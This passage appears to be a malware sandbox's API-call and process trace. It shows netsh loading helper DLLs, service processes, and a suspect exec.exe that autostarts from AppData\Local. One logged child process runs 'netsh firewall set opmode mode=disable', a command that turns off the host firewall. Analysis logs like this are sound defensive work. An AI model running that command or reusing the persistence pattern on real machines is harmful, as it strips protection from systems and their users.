[0058.385] RegisterHelper () returned 0x0 [0058.385] GetProcessHeap () returned 0x360000 [0058.385] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x630) returned 0x3a0b40 [0058.386] GetProcessHeap () returned 0x360000 [0058.386] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x39ed60 | out: hHeap=0x360000) returned 1 [0058.386] RegEnumValueW (in: hKey=0x90, dwIndex=0x8, lpValueName=0x382340, lpcchValueName=0x2875c0, lpReserved=0x0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608 | out: lpValueName="netiohlp", lpcchValueName=0x2875c0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608) returned 0x0 [0058.386] _wcsicmp (_String1="netiohlp.dll", _String2="ipxmontr.dll") returned 5 [0058.386] _wcsicmp (_String1="netiohlp.dll", _String2="ipxpromn.dll") returned 5 [0058.386] GetProcessHeap () returned 0x360000 [0058.386] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x190) returned 0x39b3f0 [0058.386] GetProcessHeap () returned 0x360000 [0058.386] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x12) returned 0x39e320 [0058.386] GetProcessHeap () returned 0x360000 [0058.386] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x1a) returned 0x39fa00 [0058.386] _wcsupr (in: _String="netiohlp.dll" | out: _String="NETIOHLP.DLL") returned="NETIOHLP.DLL" [0058.386] GetProcessHeap () returned 0x360000 [0058.386] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x397170 | out: hHeap=0x360000) returned 1 [0058.386] LoadLibraryW (lpLibFileName="NETIOHLP.DLL") returned 0x7fef3b80000 [0058.698] GetProcAddress (hModule=0x7fef3b80000, lpProcName="InitHelperDll") returned 0x7fef3b9ce30 [0058.698] InitHelperDll () returned 0x0 [0058.698] RegisterHelper () returned 0x0 [0058.698] GetProcessHeap () returned 0x360000 [0058.698] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x688) returned 0x3a1180 [0058.698] GetProcessHeap () returned 0x360000 [0058.698] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3a0b40 | out: hHeap=0x360000) returned 1 [0058.698] RegisterHelper () returned 0x0 [0058.698] GetProcessHeap () returned 0x360000 [0058.698] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x6e0) returned 0x3a1810 [0058.698] GetProcessHeap () returned 0x360000 [0058.698] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3a1180 | out: hHeap=0x360000) returned 1 [0058.698] RegisterHelper () returned 0x0 [0058.698] GetProcessHeap () returned 0x360000 [0058.698] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x738) returned 0x3a0b40 [0058.698] GetProcessHeap () returned 0x360000 [0058.698] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3a1810 | out: hHeap=0x360000) returned 1 [0058.698] RegisterHelper () returned 0x0 [0058.698] GetProcessHeap () returned 0x360000 [0058.698] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x790) returned 0x3a1280 [0058.699] GetProcessHeap () returned 0x360000 [0058.699] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3a0b40 | out: hHeap=0x360000) returned 1 [0058.699] RegisterHelper () returned 0x0 [0058.699] GetProcessHeap () returned 0x360000 [0058.699] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x7e8) returned 0x3a1a20 [0058.699] GetProcessHeap () returned 0x360000 [0058.699] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3a1280 | out: hHeap=0x360000) returned 1 [0058.699] RegisterHelper () returned 0x0 [0058.699] GetProcessHeap () returned 0x360000 [0058.699] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x840) returned 0x3a2210 [0058.699] GetProcessHeap () returned 0x360000 [0058.699] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3a1a20 | out: hHeap=0x360000) returned 1 [0058.699] RegisterHelper () returned 0x0 [0058.699] GetProcessHeap () returned 0x360000 [0058.699] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x898) returned 0x3a0b40 [0058.699] GetProcessHeap () returned 0x360000 [0058.699] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3a2210 | out: hHeap=0x360000) returned 1 [0058.699] RegisterHelper () returned 0x0 [0058.699] GetProcessHeap () returned 0x360000 [0058.699] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x8f0) returned 0x3a13e0 [0058.699] GetProcessHeap () returned 0x360000 [0058.699] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3a0b40 | out: hHeap=0x360000) returned 1 [0058.700] RegisterHelper () returned 0x0 [0058.700] GetProcessHeap () returned 0x360000 [0058.700] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x948) returned 0x3a1ce0 [0058.700] GetProcessHeap () returned 0x360000 [0058.700] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3a13e0 | out: hHeap=0x360000) returned 1 [0058.700] RegEnumValueW (in: hKey=0x90, dwIndex=0x9, lpValueName=0x382340, lpcchValueName=0x2875c0, lpReserved=0x0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608 | out: lpValueName="whhelper", lpcchValueName=0x2875c0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608) returned 0x0 [0058.700] _wcsicmp (_String1="whhelper.dll", _String2="ipxmontr.dll") returned 14 [0058.700] _wcsicmp (_String1="whhelper.dll", _String2="ipxpromn.dll") returned 14 [0058.700] GetProcessHeap () returned 0x360000 [0058.700] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x1b8) returned 0x39b590 [0058.700] GetProcessHeap () returned 0x360000 [0058.700] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x12) returned 0x39e360 [0058.700] GetProcessHeap () returned 0x360000 [0058.700] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x1a) returned 0x39eb60 [0058.700] _wcsupr (in: _String="whhelper.dll" | out: _String="WHHELPER.DLL") returned="WHHELPER.DLL" [0058.700] GetProcessHeap () returned 0x360000 [0058.700] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x39b3f0 | out: hHeap=0x360000) returned 1 [0058.700] LoadLibraryW (lpLibFileName="WHHELPER.DLL") returned 0x7fef86e0000 [0058.839] GetProcAddress (hModule=0x7fef86e0000, lpProcName="InitHelperDll") returned 0x7fef86e210c [0058.839] InitHelperDll () returned 0x0 [0058.839] RegisterHelper () returned 0x0 [0058.839] GetProcessHeap () returned 0x360000 [0058.839] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x9a0) returned 0x3a2630 [0058.839] GetProcessHeap () returned 0x360000 [0058.839] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3a1ce0 | out: hHeap=0x360000) returned 1 [0058.839] RegEnumValueW (in: hKey=0x90, dwIndex=0xa, lpValueName=0x382340, lpcchValueName=0x2875c0, lpReserved=0x0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608 | out: lpValueName="hnetmon", lpcchValueName=0x2875c0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608) returned 0x0 [0058.840] _wcsicmp (_String1="hnetmon.dll", _String2="ipxmontr.dll") returned -1 [0058.840] _wcsicmp (_String1="hnetmon.dll", _String2="ipxpromn.dll") returned -1 [0058.840] GetProcessHeap () returned 0x360000 [0058.840] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x1e0) returned 0x39efd0 [0058.840] GetProcessHeap () returned 0x360000 [0058.840] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x39e380 [0058.840] GetProcessHeap () returned 0x360000 [0058.840] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x18) returned 0x39e3a0 [0058.840] _wcsupr (in: _String="hnetmon.dll" | out: _String="HNETMON.DLL") returned="HNETMON.DLL" [0058.840] GetProcessHeap () returned 0x360000 [0058.840] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x39b590 | out: hHeap=0x360000) returned 1 [0058.840] LoadLibraryW (lpLibFileName="HNETMON.DLL") returned 0x7fef8690000 [0061.908] GetProcAddress (hModule=0x7fef8690000, lpProcName="InitHelperDll") returned 0x7fef86922a4 [0061.908] InitHelperDll () returned 0x0 [0061.908] RegisterHelper () returned 0x0 [0061.908] GetProcessHeap () returned 0x360000 [0061.908] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x9f8) returned 0x3a2fe0 [0061.908] GetProcessHeap () returned 0x360000 [0061.908] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3a2630 | out: hHeap=0x360000) returned 1 [0061.908] RegEnumValueW (in: hKey=0x90, dwIndex=0xb, lpValueName=0x382340, lpcchValueName=0x2875c0, lpReserved=0x0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608 | out: lpValueName="rpc", lpcchValueName=0x2875c0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608) returned 0x0 [0061.908] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxmontr.dll") returned 9 [0061.908] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxpromn.dll") returned 9 [0061.908] GetProcessHeap () returned 0x360000 [0061.908] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x208) returned 0x3a39e0 [0061.908] GetProcessHeap () returned 0x360000 [0061.908] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x8) returned 0x397300 [0061.908] GetProcessHeap () returned 0x360000 [0061.910] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x16) returned 0x39e420 [0061.910] _wcsupr (in: _String="rpcnsh.dll" | out: _String="RPCNSH.DLL") returned="RPCNSH.DLL" [0061.910] GetProcessHeap () returned 0x360000 [0061.910] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x39efd0 | out: hHeap=0x360000) returned 1 [0061.910] LoadLibraryW (lpLibFileName="RPCNSH.DLL") returned 0x7fef85c0000 [0062.065] GetProcAddress (hModule=0x7fef85c0000, lpProcName="InitHelperDll") returned 0x7fef85c2e88 [0062.065] InitHelperDll () returned 0x0 [0062.065] RegisterHelper () returned 0x0 [0062.065] GetProcessHeap () returned 0x360000 [0062.065] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0xa50) returned 0x3a2340 [0062.065] GetProcessHeap () returned 0x360000 [0062.066] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3a2fe0 | out: hHeap=0x360000) returned 1 [0062.066] RegisterHelper () returned 0x0 [0062.066] GetProcessHeap () returned 0x360000 [0062.066] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0xaa8) returned 0x3a2da0 [0062.066] GetProcessHeap () returned 0x360000 [0062.066] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3a2340 | out: hHeap=0x360000) returned 1 [0062.066] RegEnumValueW (in: hKey=0x90, dwIndex=0xc, lpValueName=0x382340, lpcchValueName=0x2875c0, lpReserved=0x0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608 | out: lpValueName="dot3cfg", lpcchValueName=0x2875c0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608) returned 0x0 [0062.066] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxmontr.dll") returned -5 [0062.066] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxpromn.dll") returned -5 [0062.066] GetProcessHeap () returned 0x360000 [0062.066] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x230) returned 0x39efd0 [0062.066] GetProcessHeap () returned 0x360000 [0062.066] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x39e440 [0062.066] GetProcessHeap () returned 0x360000 [0062.066] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x18) returned 0x39e460 [0062.066] _wcsupr (in: _String="dot3cfg.dll" | out: _String="DOT3CFG.DLL") returned="DOT3CFG.DLL" [0062.066] GetProcessHeap () returned 0x360000 [0062.066] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3a39e0 | out: hHeap=0x360000) returned 1 [0062.066] LoadLibraryW (lpLibFileName="DOT3CFG.DLL") returned 0x7fef85a0000 [0062.884] GetProcAddress (hModule=0x7fef85a0000, lpProcName="InitHelperDll") returned 0x7fef85a390c [0062.884] InitHelperDll () returned 0x0 [0062.884] RegisterHelper () returned 0x0 [0062.884] GetProcessHeap () returned 0x360000 [0062.884] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0xb00) returned 0x3a4c60 [0062.884] GetProcessHeap () returned 0x360000 [0062.884] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3a2da0 | out: hHeap=0x360000) returned 1 [0062.885] RegEnumValueW (in: hKey=0x90, dwIndex=0xd, lpValueName=0x382340, lpcchValueName=0x2875c0, lpReserved=0x0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608 | out: lpValueName="napmontr", lpcchValueName=0x2875c0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608) returned 0x0 [0062.885] _wcsicmp (_String1="napmontr.dll", _String2="ipxmontr.dll") returned 5 [0062.885] _wcsicmp (_String1="napmontr.dll", _String2="ipxpromn.dll") returned 5 [0062.885] GetProcessHeap () returned 0x360000 [0062.885] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x258) returned 0x3a5770 [0062.885] GetProcessHeap () returned 0x360000 [0062.885] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x12) returned 0x39e500 [0062.885] GetProcessHeap () returned 0x360000 [0062.885] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x1a) returned 0x3a2760 [0062.885] _wcsupr (in: _String="napmontr.dll" | out: _String="NAPMONTR.DLL") returned="NAPMONTR.DLL" [0062.885] GetProcessHeap () returned 0x360000 [0062.885] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x39efd0 | out: hHeap=0x360000) returned 1 [0062.885] LoadLibraryW (lpLibFileName="NAPMONTR.DLL") returned 0x7fef35d0000 [0063.984] GetProcAddress (hModule=0x7fef35d0000, lpProcName="InitHelperDll") returned 0x7fef35e048c [0063.984] InitHelperDll () returned 0x0 [0063.984] RegisterHelper () returned 0x0 [0063.984] GetProcessHeap () returned 0x360000 [0063.984] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0xb58) returned 0x3a59d0 [0063.984] GetProcessHeap () returned 0x360000 [0063.985] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3a4c60 | out: hHeap=0x360000) returned 1 [0063.985] RegisterHelper () returned 0x0 [0063.985] GetProcessHeap () returned 0x360000 [0063.985] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0xbb0) returned 0x3a6530 [0063.985] GetProcessHeap () returned 0x360000 [0063.985] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3a59d0 | out: hHeap=0x360000) returned 1 [0063.985] RegisterHelper () returned 0x0 [0063.985] GetProcessHeap () returned 0x360000 [0063.985] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0xc08) returned 0x3a70f0 [0063.985] GetProcessHeap () returned 0x360000 [0063.985] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3a6530 | out: hHeap=0x360000) returned 1 [0063.985] RegEnumValueW (in: hKey=0x90, dwIndex=0xe, lpValueName=0x382340, lpcchValueName=0x2875c0, lpReserved=0x0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608 | out: lpValueName="nshipsec", lpcchValueName=0x2875c0, lpType=0x0, lpData=0x37e090, lpcbData=0x287608) returned 0x0 [0063.985] _wcsicmp (_String1="nshipsec.dll", _String2="ipxmontr.dll") returned 5 [0063.985] _wcsicmp (_String1="nshipsec.dll", _String2="ipxpromn.dll") returned 5 [0063.985] GetProcessHeap () returned 0x360000 [0063.985] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x280) returned 0x3a7d00 [0063.986] GetProcessHeap () returned 0x360000 [0063.986] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x12) returned 0x39e5c0 [0063.986] GetProcessHeap () returned 0x360000 [0063.986] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x1a) returned 0x3a2f30 [0063.986] _wcsupr (in: _String="nshipsec.dll" | out: _String="NSHIPSEC.DLL") returned="NSHIPSEC.DLL" [0063.986] GetProcessHeap () returned 0x360000 [0063.986] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x3a5770 | out: hHeap=0x360000) returned 1 [0063.986] LoadLibraryW (lpLibFileName="NSHIPSEC.DLL") Process: id = "7" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x2b181000" os_pid = "0xa08" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x9e8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:00077683" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 21 os_tid = 0xa1c Thread: id = 22 os_tid = 0xa18 [0052.058] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x4ed600 | out: lpSystemTimeAsFileTime=0x4ed600*(dwLowDateTime=0xf23ca120, dwHighDateTime=0x1d4f17e)) [0052.058] GetCurrentProcessId () returned 0xa08 [0052.059] GetCurrentThreadId () returned 0xa18 [0052.059] GetTickCount () returned 0x1b9dc [0052.059] QueryPerformanceCounter (in: lpPerformanceCount=0x4ed608 | out: lpPerformanceCount=0x4ed608*=17186780632) returned 1 [0052.059] malloc (_Size=0x100) returned 0x568e80 [0070.908] free (_Block=0x568e80) Thread: id = 23 os_tid = 0xa14 Thread: id = 24 os_tid = 0xa10 Thread: id = 25 os_tid = 0xa0c Thread: id = 26 os_tid = 0xa20 Thread: id = 27 os_tid = 0xa24 Thread: id = 42 os_tid = 0xa40 Thread: id = 56 os_tid = 0xab0 Thread: id = 83 os_tid = 0xbc4 Process: id = "8" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x15f04000" os_pid = "0x3f8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0xa08" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dc17" [0xc000000f], "LOCAL" [0x7] Thread: id = 28 os_tid = 0x8a4 Thread: id = 29 os_tid = 0x444 Thread: id = 30 os_tid = 0x76c Thread: id = 31 os_tid = 0x758 Thread: id = 32 os_tid = 0x74c Thread: id = 33 os_tid = 0x72c Thread: id = 34 os_tid = 0x71c Thread: id = 35 os_tid = 0x718 Thread: id = 36 os_tid = 0x638 Thread: id = 37 os_tid = 0x154 Thread: id = 38 os_tid = 0x150 Thread: id = 39 os_tid = 0x12c Thread: id = 40 os_tid = 0x120 Thread: id = 41 os_tid = 0x3fc Thread: id = 61 os_tid = 0xb54 Thread: id = 81 os_tid = 0xbb0 Thread: id = 86 os_tid = 0x580 Process: id = "9" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1ce86000" os_pid = "0xa28" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0xa08" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:00078140" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 43 os_tid = 0xa44 Thread: id = 44 os_tid = 0xa3c Thread: id = 45 os_tid = 0xa38 Thread: id = 46 os_tid = 0xa34 Thread: id = 47 os_tid = 0xa30 Thread: id = 48 os_tid = 0xa2c Thread: id = 84 os_tid = 0xbc8 Process: id = "10" image_name = "netsh.exe" filename = "c:\\windows\\system32\\netsh.exe" page_root = "0x70b1f000" os_pid = "0xaa8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9b8" cmd_line = "netsh firewall set opmode mode=disable" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 52 os_tid = 0xab4 Thread: id = 55 os_tid = 0xaac Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x910c000" os_pid = "0x124" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "rpc_server" parent_id = "8" os_parent_pid = "0x3f8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e1c4" [0xc000000f], "LOCAL" [0x7] Thread: id = 62 os_tid = 0x8e8 Thread: id = 63 os_tid = 0x8a8 Thread: id = 64 os_tid = 0x6a8 Thread: id = 65 os_tid = 0x754 Thread: id = 66 os_tid = 0x704 Thread: id = 67 os_tid = 0x6e0 Thread: id = 68 os_tid = 0x6b0 Thread: id = 69 os_tid = 0x698 Thread: id = 70 os_tid = 0x678 Thread: id = 71 os_tid = 0x630 Thread: id = 72 os_tid = 0x610 Thread: id = 73 os_tid = 0x14c Thread: id = 74 os_tid = 0x140 Thread: id = 75 os_tid = 0x158 Thread: id = 76 os_tid = 0x294 Thread: id = 77 os_tid = 0x218 Thread: id = 78 os_tid = 0x230 Thread: id = 79 os_tid = 0x21c Thread: id = 80 os_tid = 0x1c4 Thread: id = 82 os_tid = 0xbb4 Thread: id = 85 os_tid = 0xbd4 Process: id = "12" image_name = "exec.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\exec.exe" page_root = "0x1faf6000" os_pid = "0x550" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e209" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 87 os_tid = 0x554 [0101.616] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31fd8c | out: lpSystemTimeAsFileTime=0x31fd8c*(dwLowDateTime=0x4434b660, dwHighDateTime=0x1d4f12b)) [0101.616] GetCurrentProcessId () returned 0x550 [0101.616] GetCurrentThreadId () returned 0x554 [0101.616] GetTickCount () returned 0x5762 [0101.616] QueryPerformanceCounter (in: lpPerformanceCount=0x31fd84 | out: lpPerformanceCount=0x31fd84*=6594207301) returned 1 [0101.616] GetStartupInfoW (in: lpStartupInfo=0x31fd30 | out: lpStartupInfo=0x31fd30*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x31fd94, hStdError=0x1028be4)) [0101.616] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0101.616] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x180000 [0101.618] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76180000 [0101.618] GetProcAddress (hModule=0x76180000, lpProcName="FlsAlloc") returned 0x76194f2b [0101.618] GetProcAddress (hModule=0x76180000, lpProcName="FlsGetValue") returned 0x76191252 [0101.618] GetProcAddress (hModule=0x76180000, lpProcName="FlsSetValue") returned 0x76194208 [0101.618] GetProcAddress (hModule=0x76180000, lpProcName="FlsFree") returned 0x7619359f [0101.619] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x214) returned 0x1807d0 [0101.619] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76180000 [0101.620] GetCurrentThreadId () returned 0x554 [0101.620] GetStartupInfoW (in: lpStartupInfo=0x31fccc | out: lpStartupInfo=0x31fccc*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x10271aa, hStdOutput=0x10274e3, hStdError=0x1807d0)) [0101.620] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x8, Size=0x800) returned 0x1809f0 [0101.620] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0101.620] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0101.620] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0101.620] SetHandleCount (uNumber=0x20) returned 0x20 [0101.620] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe\" " [0101.620] GetEnvironmentStringsW () returned 0x334770* [0101.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1409, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1409 [0101.620] RtlAllocateHeap (HeapHandle=0x180000, Flags=0x0, Size=0x581) returned 0x1811f8 [0101.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1409, lpMultiByteStr=0x1811f8, cbMultiByte=1409, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) 